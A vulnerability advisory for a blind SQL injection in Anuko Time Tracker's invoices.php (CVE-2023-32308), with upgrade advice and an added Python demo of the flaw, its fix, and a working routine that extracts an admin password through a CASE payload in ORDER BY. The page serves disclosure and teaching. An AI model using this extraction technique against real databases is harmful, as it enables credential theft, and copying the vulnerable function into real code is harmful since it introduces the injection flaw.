PT-2023-23717 · Unknown · Anuko Time Tracker
Indevi0Us
·
Published
2023-05-15
·
Updated
2023-05-25
·
CVE-2023-32308
CVSS v3.1
8.2
High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L |
Name of the Vulnerable Software and Affected Versions
Anuko Time Tracker versions prior to 1.22.11.5781
Description
The issue is a Boolean-based blind SQL injection vulnerability in the invoices.php file of Anuko Time Tracker, an open source time tracking system. It was caused by a coding error after parameter validation in POST request handling: the code did not check whether validation had reported any errors before using the submitted value to adjust the invoice sorting order. As a result, a crafted POST request could carry attacker-controlled SQL into the query sent to the Time Tracker database, and the attacker could infer data one condition at a time from differences in the response.
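The bug class the description refers to (a validator records an error, but the caller never checks it before the sort-order value reaches the query) and the check the workaround in the Recommendations section calls for, shown as an added example in Python over SQLite. This is illustrative code written for this page, not Anuko Time Tracker's PHP source: the table names, the allowlist, the sample invoices, the admin row and its password value are all constructed for the demo.

```python
import sqlite3

# Constructed, minimal stand-in for an invoice table and a user table.
# Schema, rows and the admin password value are made up for this demo.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tt_invoices (
            id INTEGER PRIMARY KEY, group_id INTEGER, name TEXT, date TEXT, status INTEGER);
        CREATE TABLE tt_users (
            id INTEGER PRIMARY KEY, login TEXT, password TEXT);
        INSERT INTO tt_invoices VALUES
            (1, 1, 'INV-C', '2023-01-10', 1),
            (2, 1, 'INV-A', '2023-02-14', 1),
            (3, 1, 'INV-B', '2023-03-03', 1);
        INSERT INTO tt_users VALUES (1, 'admin', 'd3adb33f');
    """)
    return conn

# Hypothetical allowlist of the sort columns the form is supposed to accept.
ALLOWED_SORT_FIELDS = {"name", "date"}

def validate_sort_by(sort_by):
    """Validator in the style the advisory describes: it records an error
    but does not abort; the caller has to look at the result."""
    errors = []
    if sort_by not in ALLOWED_SORT_FIELDS:
        errors.append("Invalid sort field")
    return errors

def active_invoices_vulnerable(conn, group_id, sort_by):
    """The bug class: the parameter is validated, but the error list is
    never consulted before the raw value is spliced into ORDER BY."""
    errors = validate_sort_by(sort_by)  # computed, then ignored
    sql = (f"SELECT name FROM tt_invoices WHERE group_id = {int(group_id)} "
           f"AND status = 1 ORDER BY {sort_by}")
    return [row[0] for row in conn.execute(sql)]

def active_invoices_fixed(conn, group_id, sort_by):
    """Hardened version: stop when validation reported an error, so only
    allowlisted column names ever appear in the query text."""
    if validate_sort_by(sort_by):
        return None
    sql = ("SELECT name FROM tt_invoices WHERE group_id = ? "
           f"AND status = 1 ORDER BY {sort_by}")
    return [row[0] for row in conn.execute(sql, (int(group_id),))]

def blind_extract(conn, length, charset="0123456789abcdef"):
    """Boolean-based blind extraction through the vulnerable ORDER BY: a CASE
    expression sorts by name when the guess is right and by date otherwise,
    so the order of the returned rows leaks one character per position."""
    baseline = active_invoices_vulnerable(conn, 1, "name")
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            payload = (f"(CASE WHEN (SELECT substr(password, {pos}, 1) FROM tt_users "
                       f"WHERE login = 'admin') = '{ch}' THEN name ELSE date END)")
            if active_invoices_vulnerable(conn, 1, payload) == baseline:
                recovered += ch
                break
        else:
            break  # no character matched; stop rather than guess
    return recovered

if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable ORDER BY:", blind_extract(db, 8))
    print("fixed version rejects payload:",
          active_invoices_fixed(db, 1, "(CASE WHEN 1=1 THEN name ELSE date END)") is None)
```

The two invoice orderings (by name and by date) differ, which is all a Boolean-based blind technique needs: each request answers one yes/no question, and the extraction loop asks sixteen of them per character. The fixed function keeps the same string-built ORDER BY, which is acceptable only because the check in front of it guarantees the value is one of the allowlisted identifiers; the group id, a data value rather than an identifier, is bound as a parameter.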
Recommendations
For versions prior to 1.22.11.5781, upgrade to version 1.22.11.5781 or later to resolve the issue.
As a temporary workaround for users unable to upgrade, consider inserting an additional check for errors in a condition before calling ttGroupHelper::getActiveInvoices() in invoices.php.
Exploit
Fix
SQL injection
Affected Products
Anuko Time Tracker